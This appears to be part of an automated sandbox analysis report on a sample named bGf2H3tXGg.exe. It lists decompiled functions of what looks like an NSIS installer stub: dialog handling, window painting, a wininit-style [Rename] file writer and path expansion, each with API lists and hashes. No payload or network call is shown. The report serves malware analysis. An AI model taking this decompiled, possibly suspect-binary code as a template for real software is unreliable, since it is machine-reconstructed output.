                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                • String ID:
                • API String ID: 184305955-0
                • Opcode ID: 7a5d9994b8b7d5483664d5ab44f9fe767d237ce2ed75d97b1bae36ca26718a9b
                • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                • Opcode Fuzzy Hash: 7a5d9994b8b7d5483664d5ab44f9fe767d237ce2ed75d97b1bae36ca26718a9b
                • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 91%
                			E004042E6(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                				intOrPtr _v8;
                				signed int _v12;
                				void* _v16;
                				struct HWND__* _t52;
                				long _t86;
                				int _t98;
                				struct HWND__* _t99;
                				signed int _t100;
                				intOrPtr _t107;
                				intOrPtr _t109;
                				int _t110;
                				signed int* _t112;
                				signed int _t113;
                				char* _t114;
                				CHAR* _t115;
                
                				if(_a8 != 0x110) { // 0x110 = WM_INITDIALOG
                					if(_a8 != 0x111) { // 0x111 = WM_COMMAND
                						L11:
                						if(_a8 != 0x4e) { // 0x4e = WM_NOTIFY
                							if(_a8 == 0x40b) {
                								 *0x42985c =  *0x42985c + 1;
                							}
                							L25:
                							_t110 = _a16;
                							L26:
                							return E004041E2(_a8, _a12, _t110);
                						}
                						_t52 = GetDlgItem(_a4, 0x3e8);
                						_t110 = _a16;
                						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                							_v12 = _t100;
                							_v16 = _t109;
                							_v8 = 0x42e3c0;
                							if(_t100 - _t109 < 0x800) {
                								SendMessageA(_t52, 0x44b, 0,  &_v16);
                								SetCursor(LoadCursorA(0, 0x7f02));
                								_push(1);
                								E0040458A(_a4, _v8);
                								SetCursor(LoadCursorA(0, 0x7f00));
                								_t110 = _a16;
                							}
                						}
                						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                							goto L26;
                						} else {
                							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) { // 0xd = VK_RETURN
                								SendMessageA( *0x42f428, 0x111, 1, 0); // WM_COMMAND, wParam 1 = IDOK
                							}
                							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) { // 0x1b = VK_ESCAPE
                								SendMessageA( *0x42f428, 0x10, 0, 0); // 0x10 = WM_CLOSE
                							}
                							return 1;
                						}
                					}
                					if(_a12 >> 0x10 != 0 ||  *0x42985c != 0) {
                						goto L25;
                					} else {
                						_t112 =  *0x42a068 + 0x14;
                						if(( *_t112 & 0x00000020) == 0) {
                							goto L25;
                						}
                						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                						E0040419D(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                						E00404566();
                						goto L11;
                					}
                				}
                				_t98 = _a16;
                				_t113 =  *(_t98 + 0x30);
                				if(_t113 < 0) {
                					_t107 =  *0x42ebfc; // 0x739685
                					_t113 =  *(_t107 - 4 + _t113 * 4);
                				}
                				_push( *((intOrPtr*)(_t98 + 0x34)));
                				_t114 = _t113 +  *0x42f478;
                				_push(0x22);
                				_a16 =  *_t114;
                				_v12 = _v12 & 0x00000000;
                				_t115 = _t114 + 1;
                				_v16 = _t115;
                				_v8 = E004042B1;
                				E0040417B(_a4);
                				_push( *((intOrPtr*)(_t98 + 0x38)));
                				_push(0x23);
                				E0040417B(_a4);
                				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                				E0040419D( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                				_t99 = GetDlgItem(_a4, 0x3e8);
                				E004041B0(_t99);
                				SendMessageA(_t99, 0x45b, 1, 0);
                				_t86 =  *( *0x42f434 + 0x68);
                				if(_t86 < 0) {
                					_t86 = GetSysColor( ~_t86);
                				}
                				SendMessageA(_t99, 0x443, 0, _t86);
                				SendMessageA(_t99, 0x445, 0, 0x4010000);
                				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                				 *0x42985c = 0;
                				SendMessageA(_t99, 0x449, _a16,  &_v16);
                				 *0x42985c = 0;
                				return 0;
                			}

                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                • String ID: Cgrlcpdlsle$N
                • API String ID: 3103080414-370142420
                • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                				struct tagLOGBRUSH _v16;
                				struct tagRECT _v32;
                				struct tagPAINTSTRUCT _v96;
                				struct HDC__* _t70;
                				struct HBRUSH__* _t87;
                				struct HFONT__* _t94;
                				long _t102;
                				signed int _t126;
                				struct HDC__* _t128;
                				intOrPtr _t130;
                
                				if(_a8 == 0xf) { // 0xf = WM_PAINT
                					_t130 =  *0x42f434;
                					_t70 = BeginPaint(_a4,  &_v96);
                					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                					_a8 = _t70;
                					GetClientRect(_a4,  &_v32);
                					_t126 = _v32.bottom;
                					_v32.bottom = _v32.bottom & 0x00000000;
                					while(_v32.top < _t126) {
                						_a12 = _t126 - _v32.top;
                						asm("cdq");
                						asm("cdq");
                						asm("cdq");
                						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                						_t87 = CreateBrushIndirect( &_v16);
                						_v32.bottom = _v32.bottom + 4;
                						_a16 = _t87;
                						FillRect(_a8,  &_v32, _t87);
                						DeleteObject(_a16);
                						_v32.top = _v32.top + 4;
                					}
                					if( *(_t130 + 0x58) != 0xffffffff) {
                						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                						_a16 = _t94;
                						if(_t94 != 0) {
                							_t128 = _a8;
                							_v32.left = 0x10;
                							_v32.top = 8;
                							SetBkMode(_t128, 1);
                							SetTextColor(_t128,  *(_t130 + 0x58));
                							_a8 = SelectObject(_t128, _a16);
                							DrawTextA(_t128, "Template Method Pattern Setup", 0xffffffff,  &_v32, 0x820);
                							SelectObject(_t128, _a8);
                							DeleteObject(_a16);
                						}
                					}
                					EndPaint(_a4,  &_v96);
                					return 0;
                				}
                				_t102 = _a16;
                				if(_a8 == 0x46) { // 0x46 = WM_WINDOWPOSCHANGING
                					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                					 *((intOrPtr*)(_t102 + 4)) =  *0x42f428;
                				}
                				return DefWindowProcA(_a4, _a8, _a12, _t102);
                			}

                APIs
                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                • BeginPaint.USER32(?,?), ref: 00401047
                • GetClientRect.USER32 ref: 0040105B
                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                • FillRect.USER32 ref: 004010E4
                • DeleteObject.GDI32(?), ref: 004010ED
                • CreateFontIndirectA.GDI32(?), ref: 00401105
                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                • SelectObject.GDI32(00000000,?), ref: 00401140
                • DrawTextA.USER32(00000000,Template Method Pattern Setup,000000FF,00000010,00000820), ref: 00401156
                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                • DeleteObject.GDI32(?), ref: 00401165
                • EndPaint.USER32(?,?), ref: 0040116E
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                • String ID: F$Template Method Pattern Setup
                • API String ID: 941294808-3130351657
                • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405D66(void* __ecx) {
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				long _t12;
                				long _t24;
                				char* _t31;
                				int _t37;
                				void* _t38;
                				intOrPtr* _t39;
                				long _t42;
                				CHAR* _t44;
                				void* _t46;
                				void* _t48;
                				void* _t49;
                				void* _t52;
                				void* _t53;
                
                				_t38 = __ecx;
                				_t44 =  *(_t52 + 0x14);
                				 *0x42c620 = 0x4c554e; // little-endian bytes of the string "NUL"
                				if(_t44 == 0) {
                					L3:
                					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca20, 0x400);
                					if(_t12 != 0 && _t12 <= 0x400) {
                						_t37 = wsprintfA(0x42c220, "%s=%s\r\n", 0x42c620, 0x42ca20);
                						_t53 = _t52 + 0x10;
                						E0040618A(_t37, 0x400, 0x42ca20, 0x42ca20,  *((intOrPtr*)( *0x42f434 + 0x128)));
                						_t12 = E00405C90(0x42ca20, 0xc0000000, 4); // CreateFile-style arguments: GENERIC_READ|GENERIC_WRITE, OPEN_ALWAYS
                						_t48 = _t12;
                						 *(_t53 + 0x18) = _t48;
                						if(_t48 != 0xffffffff) {
                							_t42 = GetFileSize(_t48, 0);
                							_t6 = _t37 + 0xa; // 0xa
                							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                							if(_t46 == 0 || E00405D08(_t48, _t46, _t42) == 0) {
                								L18:
                								return CloseHandle(_t48);
                							} else {
                								if(E00405BF5(_t38, _t46, "[Rename]\r\n") != 0) { // look for an existing wininit.ini-style [Rename] section
                									_t49 = E00405BF5(_t38, _t21 + 0xa, 0x40a3d8);
                									if(_t49 == 0) {
                										_t48 =  *(_t53 + 0x18);
                										L16:
                										_t24 = _t42;
                										L17:
                										E00405C4B(_t24 + _t46, 0x42c220, _t37);
                										SetFilePointer(_t48, 0, 0, 0);
                										E00405D37(_t48, _t46, _t42 + _t37);
                										GlobalFree(_t46);
                										goto L18;
                									}
                									_t39 = _t46 + _t42;
                									_t31 = _t39 + _t37;
                									while(_t39 > _t49) {
                										 *_t31 =  *_t39;
                										_t31 = _t31 - 1;
                										_t39 = _t39 - 1;
                									}
                									_t24 = _t49 - _t46 + 1;
                									_t48 =  *(_t53 + 0x18);
                									goto L17;
                								}
                								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                								_t42 = _t42 + 0xa;
                								goto L16;
                							}
                						}
                					}
                				} else {
                					CloseHandle(E00405C90(_t44, 0, 1));
                					_t12 = GetShortPathNameA(_t44, 0x42c620, 0x400);
                					if(_t12 != 0 && _t12 <= 0x400) {
                						goto L3;
                					}
                				}
                				return _t12;
                			}

                APIs
                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                • GetShortPathNameA.KERNEL32 ref: 00405DA0
                  • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                  • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                • GetShortPathNameA.KERNEL32 ref: 00405DBD
                • wsprintfA.USER32 ref: 00405DDB
                • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                • GlobalFree.KERNEL32 ref: 00405EC4
                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                  • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\bGf2H3tXGg.exe,80000000,00000003), ref: 00405C94
                  • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                • String ID: %s=%s$[Rename]
                • API String ID: 2171350718-1727408572
                • Opcode ID: c8a07bbf3a544e04db1531592beb9b39ed12da8dfdba65436ce2583c9172ea3a
                • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                • Opcode Fuzzy Hash: c8a07bbf3a544e04db1531592beb9b39ed12da8dfdba65436ce2583c9172ea3a
                • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E0040618A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                				struct _ITEMIDLIST* _v8;
                				char _v12;
                				signed int _v16;
                				signed char _v20;
                				signed int _v24;
                				signed char _v28;
                				signed int _t38;
                				CHAR* _t39;
                				signed int _t41;
                				char _t52;
                				char _t53;
                				char _t55;
                				char _t57;
                				void* _t65;
                				char* _t66;
                				signed int _t80;
                				intOrPtr _t86;
                				char _t88;
                				void* _t89;
                				CHAR* _t90;
                				void* _t92;
                				signed int _t97;
                				signed int _t99;
                				void* _t100;
                
                				_t92 = __esi;
                				_t89 = __edi;
                				_t65 = __ebx;
                				_t38 = _a8;
                				if(_t38 < 0) {
                					_t86 =  *0x42ebfc; // 0x739685
                					_t38 =  *(_t86 - 4 + _t38 * 4);
                				}
                				_push(_t65);
                				_push(_t92);
                				_push(_t89);
                				_t66 = _t38 +  *0x42f478;
                				_t39 = 0x42e3c0;
                				_t90 = 0x42e3c0;
                				if(_a4 >= 0x42e3c0 && _a4 - 0x42e3c0 < 0x800) {
                					_t90 = _a4;
                					_a4 = _a4 & 0x00000000;
                				}
                				while(1) {
                					_t88 =  *_t66;
                					if(_t88 == 0) {
                						break;
                					}
                					__eflags = _t90 - _t39 - 0x400;
                					if(_t90 - _t39 >= 0x400) {
                						break;
                					}
                					_t66 = _t66 + 1;
                					__eflags = _t88 - 4;
                					_a8 = _t66;
                					if(__eflags >= 0) {
                						if(__eflags != 0) {
                							 *_t90 = _t88;
                							_t90 =  &(_t90[1]);
                							__eflags = _t90;
                						} else {
                							 *_t90 =  *_t66;
                							_t90 =  &(_t90[1]);
                							_t66 = _t66 + 1;
                						}
                						continue;
                					}
                					_t41 =  *((char*)(_t66 + 1));
                					_t80 =  *_t66;
                					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
                					_v24 = _t80;
                					_v28 = _t80 | 0x00000080;
                					_v16 = _t41;
                					_v20 = _t41 | 0x00000080;
                					_t66 = _a8 + 2;
                					__eflags = _t88 - 2;
                					if(_t88 != 2) {
                						__eflags = _t88 - 3;
                						if(_t88 != 3) {
                							__eflags = _t88 - 1;
                							if(_t88 == 1) {
                								__eflags = (_t41 | 0xffffffff) - _t97;
                								E0040618A(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
                							}
                							L42:
                							_t90 =  &(_t90[lstrlenA(_t90)]);
                							_t39 = 0x42e3c0;
                							continue;
                						}
                						__eflags = _t97 - 0x1d;
                						if(_t97 != 0x1d) {
                							__eflags = (_t97 << 0xa) + 0x430000;
                							E004060F7(_t90, (_t97 << 0xa) + 0x430000);
                						} else {
                							E00406055(_t90,  *0x42f428);
                						}
                						__eflags = _t97 + 0xffffffeb - 7;
                						if(_t97 + 0xffffffeb < 7) {
                							L33:
                							E004063D2(_t90);
                						}
                						goto L42;
                					}
                					_t52 =  *0x42f42c;
                					__eflags = _t52;
                					_t99 = 2;
                					if(_t52 >= 0) {
                						L13:
                						_a8 = 1;
                						L14:
                						__eflags =  *0x42f4c4;
                						if( *0x42f4c4 != 0) {
                							_t99 = 4;
                						}
                						__eflags = _t80;
                						if(__eflags >= 0) {
                							__eflags = _t80 - 0x25;
                							if(_t80 != 0x25) {
                								__eflags = _t80 - 0x24;
                								if(_t80 == 0x24) {
                									GetWindowsDirectoryA(_t90, 0x400);
                									_t99 = 0;
                								}
                								while(1) {
                									__eflags = _t99;
                									if(_t99 == 0) {
                										goto L30;
                									}
                									_t53 =  *0x42f424;
                									_t99 = _t99 - 1;
                									__eflags = _t53;
                									if(_t53 == 0) {
                										L26:
                										_t55 = SHGetSpecialFolderLocation( *0x42f428,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
                										__eflags = _t55;
                										if(_t55 != 0) {
                											L28:
                											 *_t90 =  *_t90 & 0x00000000;
                											__eflags =  *_t90;
                											continue;
                										}
                										__imp__SHGetPathFromIDListA(_v8, _t90);
                										_v12 = _t55;
                										__imp__CoTaskMemFree(_v8);
                										__eflags = _v12;
                										if(_v12 != 0) {
                											goto L30;
                										}
                										goto L28;
                									}
                									__eflags = _a8;
                									if(_a8 == 0) {
                										goto L26;
                									}
                									_t57 =  *_t53( *0x42f428,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
                									__eflags = _t57;
                									if(_t57 == 0) {
                										goto L30;
                									}
                									goto L26;
                								}
                								goto L30;
                							}
                							GetSystemDirectoryA(_t90, 0x400);
                							goto L30;
                						} else {
                							E00405FDE((_t80 & 0x0000003f) +  *0x42f478, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f478, _t90, _t80 & 0x00000040);
                							__eflags =  *_t90;
                							if( *_t90 != 0) {
                								L31:
                								__eflags = _v16 - 0x1a;
                								if(_v16 == 0x1a) {
                									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
                								}
                								goto L33;
                							}
                							E0040618A(_t66, _t90, _t99, _t90, _v16);
                							L30:
                							__eflags =  *_t90;
                							if( *_t90 == 0) {
                								goto L33;
                							}
                							goto L31;
                						}
                					}
                					__eflags = _t52 - 0x5a04;
                					if(_t52 == 0x5a04) {
                						goto L13;
                					}
                					__eflags = _v16 - 0x23;
                					if(_v16 == 0x23) {
                						goto L13;
                					}
                					__eflags = _v16 - 0x2e;
                					if(_v16 == 0x2e) {
                						goto L13;
                					} else {
                						_a8 = _a8 & 0x00000000;
                						goto L14;
                					}
                				}
                				 *_t90 =  *_t90 & 0x00000000;
                				if(_a4 == 0) {
                					return _t39;
                				}
                				return E004060F7(_a4, _t39);
                			}

                APIs
                • GetSystemDirectoryA.KERNEL32 ref: 004062B5
                • GetWindowsDirectoryA.KERNEL32(Cgrlcpdlsle,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                • SHGetSpecialFolderLocation.SHELL32(00405256,7519EA30,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                • SHGetPathFromIDListA.SHELL32(7519EA30,Cgrlcpdlsle), ref: 00406312
                • CoTaskMemFree.OLE32(7519EA30), ref: 0040631E
                • lstrcatA.KERNEL32(Cgrlcpdlsle,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                • lstrlenA.KERNEL32(Cgrlcpdlsle,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00422848,7519EA30), ref: 00406394
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                • String ID: Cgrlcpdlsle$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                • API String ID: 717251189-3367223608
                • Opcode ID: b81506d31a7a79703f981676f635a9404e1a7eaaabc2c3c435cbfeb6c21f0a75
                • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                • Opcode Fuzzy Hash: b81506d31a7a79703f981676f635a9404e1a7eaaabc2c3c435cbfeb6c21f0a75
                • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004063D2(CHAR* _a4) {
                				char _t5;
                				char _t7;
                				char* _t15;
                				char* _t16;
                				CHAR* _t17;
                
                				_t17 = _a4;
                				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                					_t17 =  &(_t17[4]);
                				}
                				if( *_t17 != 0 && E00405AFC(_t17) != 0) {
                					_t17 =  &(_t17[2]);
                				}
                				_t5 =  *_t17;
                				_t15 = _t17;
                				_t16 = _t17;
                				if(_t5 != 0) {
                					do {
                						if(_t5 > 0x1f &&  *((char*)(E00405ABA("*?|<>/\":", _t5))) == 0) {
                							E00405C4B(_t16, _t17, CharNextA(_t17) - _t17);
                							_t16 = CharNextA(_t16);
                						}
                						_t17 = CharNextA(_t17);
                						_t5 =  *_t17;
                					} while (_t5 != 0);
                				}
                				 *_t16 =  *_t16 & 0x00000000;
                				while(1) {
                					_t16 = CharPrevA(_t15, _t16);
                					_t7 =  *_t16;
                					if(_t7 != 0x20 && _t7 != 0x5c) {
                						break;
                					}
                					 *_t16 =  *_t16 & 0x00000000;
                					if(_t15 < _t16) {
                						continue;
                					}
                					break;
                				}
                				return _t7;
                			}

                APIs
                • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\bGf2H3tXGg.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                • CharNextA.USER32(?,"C:\Users\user\Desktop\bGf2H3tXGg.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                • CharPrevA.USER32(?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                • *?|<>/":, xrefs: 0040641A
                • "C:\Users\user\Desktop\bGf2H3tXGg.exe" , xrefs: 0040640E
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: Char$Next$Prev
                • String ID: "C:\Users\user\Desktop\bGf2H3tXGg.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                • API String ID: 589700163-1922592958
                • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004041E2(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                				struct tagLOGBRUSH _v16;
                				long _t39;
                				long _t41;
                				void* _t44;
                				signed char _t50;
                				long* _t54;
                
                				if(_a4 + 0xfffffecd > 5) {
                					L18:
                					return 0;
                				}
                				_t54 = GetWindowLongA(_a12, 0xffffffeb);
                				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                					goto L18;
                				} else {
                					_t50 = _t54[5];
                					if((_t50 & 0xffffffe0) != 0) {
                						goto L18;
                					}
                					_t39 =  *_t54;
                					if((_t50 & 0x00000002) != 0) {
                						_t39 = GetSysColor(_t39);
                					}
                					if((_t54[5] & 0x00000001) != 0) {
                						SetTextColor(_a8, _t39);
                					}
                					SetBkMode(_a8, _t54[4]);
                					_t41 = _t54[1];
                					_v16.lbColor = _t41;
                					if((_t54[5] & 0x00000008) != 0) {
                						_t41 = GetSysColor(_t41);
                						_v16.lbColor = _t41;
                					}
                					if((_t54[5] & 0x00000004) != 0) {
                						SetBkColor(_a8, _t41);
                					}
                					if((_t54[5] & 0x00000010) != 0) {
                						_v16.lbStyle = _t54[2];
                						_t44 = _t54[3];
                						if(_t44 != 0) {
                							DeleteObject(_t44);
                						}
                						_t54[3] = CreateBrushIndirect( &_v16);
                					}
                					return _t54[3];
                				}
                			}

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                • String ID:
                • API String ID: 2320649405-0
                • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
